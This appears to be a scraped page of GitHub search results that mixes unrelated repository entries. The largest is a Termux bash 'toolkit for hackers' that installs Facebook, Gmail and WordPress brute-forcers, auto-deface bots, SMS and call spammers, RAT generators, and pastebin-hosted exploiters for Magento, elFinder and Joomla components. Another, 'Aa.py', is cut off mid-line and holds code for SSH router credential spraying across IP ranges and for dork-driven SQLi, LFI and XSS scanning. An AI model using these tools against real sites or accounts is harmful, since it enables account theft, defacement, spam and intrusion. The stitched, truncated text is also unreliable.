445 skills found · Page 6 of 15
60-n3z / Mbahd3m4n6#!/data/data/com.termux/files/usr/bin/bash # Auto Install Tools v.2.1 # coded By Mr.60-n3z # dark line asosiasion # Bersihkan Layar clear blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> Terima kasih sudah make tools saya ... " sleep 1 echo "" echo -e $white"[#]> Mr.60-n3z Wuzz Here ... " read enter exit } echo -e $red" —-oooO—-" echo -e $red" —-(—)—-" echo -e $white" —–\–(–" echo -e $white" ——\_)-" echo -e $red" ***********************************************" echo -e $white" # $red toolkit for hackers v2.1 $white #" echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: mr.60-n3z drak cyber.net $white #" echo -e $red" # $white greetz :Dark line - Anonymous Cyber team $red#" echo -e $white" # $white copyright : ./Mr 60-n3z $white #" echo -e $red" # $white thanks to : 4wsec - Mr.haikal $red #" echo -e $white" ***********************************************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) Youtube Dl" echo -e $green" 10) viSQL " echo -e $green" 11) Weeman" echo -e $green" 12) WFDroid" echo -e $green" 13) FBBrute" echo -e $green" 14) Ngrok" echo -e $green" 15) Torshammer " echo -e $green" 16) RouterSploit " echo -e $green" 17) Hydra " echo -e $green" 18) Weevely " echo -e $green" 19) SQLMap " echo -e $green" 20) Dirbuster " echo -e $green" 21) admin finder " echo -e $green" 22) lokomedia exploiter " echo -e $green" 23) elfinder exploiter " echo -e $green" 24) magento add admin exploiter " echo -e $green" 25) scanner tools " echo -e $green" 26) bing dorker " echo -e $green" 27) katoolin " echo -e $green" 28) arch linux " echo -e $green" 29) linux fedora" echo -e $green" 30) hash-buster" echo -e $green" 31) sudo" echo -e $green" 32) aircrack-ng" echo -e $green" 33) joomscan" echo -e $green" 34) bing-ip2hosts" echo -e $green" 35) BlueMaho" echo -e $green" 36) Bluepot" echo -e $green" 37) honeypot" echo -e $green" 38) bot auto deface 1" echo -e $green" 39) bot auto deface 2" echo -e $green" 40) mailer sender cli" echo -e $green" 41) Wordpress Brute Force" echo -e $green" 42) Oh-myzsh theme for termux" echo -e $green" 43) instabot (instagram bot)" echo -e $green" 44) fsociety" echo -e $green" 45) Cms Scanner" echo -e $green" 46) Information Gathering" echo -e $green" 47) com_fabrik exploiter" echo -e $green" 48) com foxcontact exploiter" echo -e $green" 49) gmail brute force" echo -e $green" 50) ezsploit" echo -e $green" 51) spammer-grab sms" echo -e $green" 52) spammer call toko-pedia" echo -e $green" 53) The Fat Rat" echo -e $green" 54) IPGeolocation" echo -e $green" 55) exit" echo -e $white"" read -p "[60-n3z @Tools]> " act; if [ $act = 01 ] || [ $act = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $blue" sampun rampung " fi if [ $act = 02 ] || [ $act = 02 ] then clear echo -e $green" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 git clone https://github.com/shawarkhanethicalhacker/D-TECT echo -e $red" pun rampung mas " fi if [ $act = 03 ] || [ $act = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" sampun mantun mas " fi if [ $act = 04 ] || [ $act = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" wes mari cak " fi if [ $act = 05 ] || [ $act = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" pun rampung boz " fi if [ $act = 06 ] || [ $act = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo -e $red" Mari Install Cuk " fi if [ $act = 07 ] || [ $act = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" pun ng Install Cuk " fi if [ $act = 08 ] || [ $act = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" > /data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/resolv.conf echo -e $red" Sampun mantun " fi if [ $act = 09 ] || [ $act = 09 ] then clear echo -e $green" Installing Youtube DL " sleep 1 apt update && apt upgrade apt install python pip3 install mps_youtube pip3 install youtube_dl apt install mpv echo " Untuk menjalankannya ketik "mpsyt" tanpa tanda petik " echo -e $red" Done Install Cuk " fi if [ $act = 10 ] || [ $act = 10 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python2 git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 11 ] || [ $act = 11 ] then clear echo -e $green" Installing Weeman " sleep 1 apt update && apt upgrade pkg install git apt install python2 git clone https://github.com/samyoyo/weeman cd ~/weeman pip2 install beautifulsoup pip2 install bs4 cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 12 ] || [ $act = 12 ] then clear echo -e $green" Installing WFDroid " sleep 1 apt update && apt upgrade apt install wget mkdir wfdroid cd ~/wfdroid wget https://raw.githubusercontent.com/bytezcrew/wfdroid-termux/master/wfdinstall chmod 777 wfdinstall sh wfdinstall cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 13 ] || [ $act = 13 ] then clear sleep 1 echo -e $green" Installing FBBrute " apt install python2 apt install python2-dev apt install wget pip2 install mechanize mkdir fbbrute cd ~/fbbrute wget https://pastebin.com/raw/aqMBt2xA -O fbbrute.py wget http://override.waper.co/files/password.apk mv password.apk password.txt chmod 777 fbbrute.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 14 ] || [ $act = 14 ] then clear echo -e $green" Installing Ngrok " sleep 1 apt install wget mkdir ngrok cd ~/ngrok wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 15 ] || [ $act = 15 ] then clear echo -e $green" Installing Hammer " sleep 1 pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 16 ] || [ $act = 16 ] then clear echo -e $green" Installing Routersploit " sleep 1 apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 17 ] || [ $act = 17 ] then clear echo -e $green" Installing Hydra " sleep 1 apt update && apt install -y wget apt install hydra wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 18 ] || [ $act = 18 ] then clear echo -e $green" Installing Weevely " sleep 1 pkg update pkg upgrade git clone https://github.com/glides/Weevely cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 19 ] || [ $act = 19 ] then clear echo -e $green" Installing SQLMap " sleep 1 apt update && apt upgrade apt install python2 git clone https://github.com/sqlmapproject/sqlmap.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 20 ] || [ $act = 20 ] then clear echo -e $green" Installing Dirbuster " sleep 1 apt-get update apt-get install python apt-get install git git clone https://github.com/maurosoria/dirsearch.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 21 ] || [ $act = 21 ] then clear echo -e $green" Installing admin finder " sleep 1 apt update && apt upgrade apt-get install php mkdir adfin cd ~/webdav wget https://pastebin.com/raw/32txZ6Qr -O adfin.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 22 ] || [ $act = 22 ] then clear echo -e $green" installing lokomedia exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir lokomed cd ~/lokomed wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : php lokomedia.php a.txt " fi if [ $act = 23 ] || [ $act = 23 ] then clear echo -e $green" installing elfinder exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir elfinder cd ~/elfinder wget https://pastebin.com/raw/S7Y2V19h -O elfinder.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 24 ] || [ $act = 24 ] then clear echo -e $green" installing magento add admin exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir magento cd ~/magento wget https://pastebin.com/raw/PXkG73pG -O magento.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 25 ] || [ $act = 25 ] then clear echo -e $green" installing scanner tools " sleep 1 apt update && apt upgrade apt install python2 mkdir scanner cd ~/scanner wget https://pastebin.com/raw/m79t1Zia -O scanner.py wget https://pastebin.com/raw/mgKxMWXh -O admins.1337 wget https://pastebin.com/raw/EafKj98D -O files.1337 cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : python2 scanner.py site.com -m files " fi if [ $act = 26 ] || [ $act = 26 ] then clear echo -e $green" installing bing dorker " sleep 1 apt update && apt upgrade apt-get install php mkdir bing cd ~/bing wget https://pastebin.com/raw/tjQY6Tsg -O dorker.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 27 ] || [ $act = 27 ] then clear echo -e $green" installing katoolin " sleep 1 apt update && apt upgrade pkg install git pkg install python2 pkg install gnupg pkg install nano git clone https://github.com/LionSec/katoolin.git cd ~/katoolin echo -e $green"note : nano katoolin.py ganti semua kode /etc/apt/source.list dengan /data/data/com.termux/files/usr/etc/apt/sources.list kemudian simpan dengan menekan ctrl O enter kemudian ctrl X . jika tidak ada menu ctrl pada keyboard munculkan dengan menahan tombol volume atas kemudian ketik Q pada keyboard maka menu ctrl akan muncul di atas keyboard python2 katoolin.py Sisanya bisa mengikuti cara install di atas, Jika menemui masalah gpg error saat melakukan add repository install gnupg-curl dengan perintah pkg install gnupg-curl Untuk yg menggunakan termux dengan cpu arm64 (aarch64) tidak bisa menambahkan repositori kali linux karna kali linux tidak support aarch64, jadi sebelum menginstall tools kali di termux wajib dengan android dengan arm32 jika arm64 gunakan gnuroot" echo -e $red" Done Install Cuk " fi if [ $act = 28 ] || [ $act = 28 ] then clear echo -e $green" installing arch linux " sleep 1 apt update && apt upgrade apt-get install git cd ~/ git clone https://github.com/sdrausty/termux-archlinux.git cd termux-archlinux chmod +x setupTermuxArch.sh ./setupTermuxArch.sh echo -e $red" Done Install Cuk " fi if [ $act = 29 ] || [ $act = 29 ] then clear echo -e $green" installing fedora " sleep 1 apt update && apt upgrade apt-get install git apt install wget git clone https://github.com/nmilosev/termux-fedora.git cd termux-fedora chmod +x termux-fedora.sh echo -e $red" Done Install Cuk " fi if [ $act = 30 ] || [ $act = 30 ] then clear echo -e $green" installing hash-Buster " sleep 1 apt update && apt upgrade apt install python2 && apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster echo -e $red" Done Install Cuk " fi if [ $act = 31 ] || [ $act = 31 ] then clear echo -e $green" installing sudo " sleep 1 apt update && apt upgrade pkg install git ncurses-utils git clone https://github.com/st42/termux-sudo.git cd termux-sudo cat sudo > /data/data/com.termux/files/usr/bin/sudo chmod 700 /data/data/com.termux/files/usr/bin/sudo echo -e $red" Done Install Cuk " fi if [ $act = 32 ] || [ $act = 32 ] then clear echo -e $green" installing aircrack-ng " sleep 1 apt-get update && apt-get upgrade apt-get install aircrack-ng echo -e $red" done install cuk " fi if [ $act = 33 ] || [ $act = 33 ] then clear echo -e $green" installing joomscan " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install perl git clone https://github.com/rezasp/joomscan.git echo -e $red" done install cuk " fi if [ $act = 34 ] || [ $act = 34 ] then clear echo -e $green" installing bing-ip2hosts " sleep 1 apt-get update && apt-get upgrade apt-get install wget wget http://www.morningstarsecurity.com/downloads/bing-ip2hosts-0.4.tar.gz && tar -xzvf bing-ip2hosts-0.4.tar.gz && cp bing-ip2hosts-0.4/bing-ip2hosts /usr/local/bin/t echo -e $red" done install cuk " fi if [ $act = 35 ] || [ $act = 35 ] then clear echo -e $green" installing BlueMaho " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluemaho.git echo -e $red" done install cuk " fi if [ $act = 36 ] || [ $act = 36 ] then clear echo -e $green" installing Bluepot " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluepot.git echo -e $red" done install cuk " fi if [ $act = 37 ] || [ $act = 37 ] then clear echo -e $green" installing honeypot " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install php git clone https://github.com/whackashoe/php-spam-mail-honeypot.git echo -e $red" done install cuk " fi if [ $act = 38 ] || [ $act = 38 ] then clear echo -e $green" installing bot auto deface 1 " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install wget apt-get install perl apt-get install unzip git clone https://github.com/mrcakil/bot.git cd bot unzip bot.zip cd xploit chmod 777 bot.pl echo -e $red" Lokasi bot ? /bot/xploit/bot.pl" echo -e $red" done install cuk " fi if [ $act = 39 ] || [ $act = 39 ] then clear echo -e $green" installing bot auto deface 2 " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install perl git clone https://github.com/Moham3dRiahi/XAttacker cd XAttacker chmod 777 XAttacker.pl echo -e $red" done install cuk " fi if [ $act = 40 ] || [ $act = 40 ] then clear echo -e $green" installing mailer-sender " sleep 1 apt-get update && apt-get upgrade apt-get install php5-cli curl -sS https://getcomposer.org/installer | php chmod +x composer.phar sudo mv composer.phar /usr/bin/composer git clone https://github.com/pedro-stanaka/mailer-cli.git echo -e $red" note !! " echo -e $red" usage php sendmail.php notification:mailer <email> <subject> <body>; " echo -e $red" or " echo -e $red" php sendmail.php --help " echo -e $red" done install cuk " fi if [ $act = 41 ] || [ $act = 41 ] then clear echo -e $green" installing wordpress brute force " sleep 1 apt-get update && apt-get upgrade apt-get install python2 pip install request git clone https://github.com/atarantini/wpbf echo -e $red" done install cuk " fi if [ $act = 42 ] || [ $act = 42 ] then clear echo -e $green" installing termux Ohmyzsh " sleep 1 apt-get update && apt-get upgrade sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)" ~/.termux/colors.sh echo -e $red" ganti color ? ketik ~/.termux/colors.sh " echo -e $red" Done Install Cuk " fi if [ $act = 43 ] || [ $act = 43 ] then clear echo -e $green" installing Instabot instagram bot " sleep 1 apt-get update && apt-get upgrade pkg install python2 apt-get install git apt-get install nano git clone https://github.com/instabot-py/instabot.py echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd instabot.py echo -e $red" ketik nano example.py " echo -e $red" masukan username dan password mu" echo -e $red" Done cuk " fi if [ $act = 44 ] || [ $act = 44 ] then clear echo -e $green" installing fsociety " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Manisso/fsociety echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd fsociety echo -e $red" python fsociety.py " fi if [ $act = 45 ] || [ $act = 45 ] then clear echo -e $green" installing CMS Scanner " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Dionach/CMSmap.git sleep 1 cd CMSmap echo -e $red" Usage: cmsmap.py -t <URL> " fi if [ $act = 46 ] || [ $act = 46 ] then clear echo -e $green" installing INFORMATION Gathering " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/m4ll0k/Infoga.git infoga sleep 1 cd infoga pip install -r req echo -e $red" Usage: python infoga.py " fi if [ $act = 47 ] || [ $act = 47 ] then clear echo -e $green" installing com fabrik exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/LDvFvtUD -O com_fabrik.php sleep 1 echo -e $red" Usage: php com_fabrik.php target.txt " fi if [ $act = 48 ] || [ $act = 48 ] then clear echo -e $green" installing com foxcontact exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/EAtSir5V -O com_foxcontact.php sleep 1 echo -e $red" Usage: php com_foxcontact.php target.txt " fi if [ $act = 49 ] || [ $act = 49 ] then clear echo -e $green" installing gmail brute force " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/JamesAndresCM/Brute_force_gmail sleep 1 echo -e $red" Usage: python2.7 brute_force_gmail.py example@gmail.com PATH_TO_DICTIONARY " fi if [ $act = 50 ] || [ $act = 50 ] then clear echo -e $green" installing ezsploit " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/rand0m1ze/ezsploit sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 51 ] || [ $act = 51 ] then clear echo -e $green" installing spammer grab " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 pip install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab/ sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 52 ] || [ $act = 52 ] then clear echo -e $green" installing spammer toko pedia " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install unzip apt-get install php git clone https://github.com/mrcakil/spam cd spam unzip toko-pedia.zip sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 53 ] || [ $act = 53 ] then clear echo -e $green" installing TheFatRat " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 54 ] || [ $act = 54 ] then clear echo -e $green" installing IPGeolocation " sleep 1 apt-get update && apt-get upgrade apt-get install git apt install python2 git clone https://github.com/maldevel/IPGeolocation.git cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt sleep 1 echo -e $red" pun Install cuk " fi if [ $act = 55 ] || [ $act = 55 ] then echo -e $green" pesan terakhir " sleep 1 echo -e $green" dadi wong jowo " sleep 1 echo -e $green" kudu jawani " sleep 1 echo -e $green" Please Wait.... " sleep 1 echo -e $green" contact : mr.60-n3z dark line.net " sleep 1 echo -e $red" web : https://clannokturnal.blogspot.com " sleep 1 echo -e $red" Bye ea :* " sleep 1 exit fi
cclauss / Find Python Syntax Errors ActionA GitHub Action that finds Python syntax errors and undefined names in your repo
cyberflakeconnect / WascanWAScan ((W)eb (A)pplication (Scan)ner) is a Open Source web application security scanner. It is designed to find various vulnerabilities using "black-box" method, that means it won't study the source code of web applications but will work like a fuzzer, scanning the pages of the deployed web application, extracting links and forms and attacking the scripts, sending payloads and looking for error messages,..etc. WAScan is built on python2.7 and can run on any platform which has a Python environment.
LinterexEvilCommunity / PenbloodLicense Compatible Python2x Python3x Pure Blood v2 A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter Menu Web Pentest / Information Gathering: Banner Grab Whois Traceroute DNS Record Reverse DNS Lookup Zone Transfer Lookup Port Scan Admin Panel Scan Subdomain Scan CMS Identify Reverse IP Lookup Subnet Lookup Extract Page Links Directory Fuzz (NEW) File Fuzz (NEW) Shodan Search (NEW) Shodan Host Lookup (NEW) Web Application Attack: (NEW) Wordpress | WPScan | WPScan Bruteforce | Wordpress Plugin Vulnerability Checker Features: // I will add more soon. | WordPress Woocommerce - Directory Craversal | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion | WordPress Plugin Events Calendar - 'event_id' SQL Injection Auto SQL Injection Features: | Union Based | (Error Output = False) Detection | Tested on 100+ Websites Generator: Deface Page Password Generator // NEW Text To Hash //NEW Author's Words: This project is managed / enhanced everyday and sorry if it takes a while before another version is published. Well, I'm the only one who is managing this and also I have personal daily activities. This tool is for everyone. So please open an issue if you run into a bug. Well I can only test it in Windows and Kali Linux since that's the only device I have. Also please try the new AUTO SQL Injection that I'm proud of currently. I created a video already on how I created it. Check it out on my Youtube Channel. The WPScan is also checked for Windows and Kali Linux. If you are using other Linux Distro please add wpscan in your ~/.bashrc. Installation Any Python Version. $ git clone https://github.com/cr4shcod3/pureblood $ cd pureblood $ pip install -r requirements.txt
python-poetry / CrashtestManage Python errors with ease
jsspencer / Testcodetestcode is a python module for testing for regression errors in numerical (principally scientific) software.
google-research / Runtime Error PredictionThis is the repository for the paper Static Prediction of Runtime Errors by Learning to Execute Programs with External Resource Descriptions, and for the Python Runtime Errors (PRE) dataset.
NCSGgroup / SaGEAA Python toolbox for comprehensive post-processing and error assessment of GRACE and GRACE-FO based mass change
udinparla / Aa.py#!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYm0le');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = 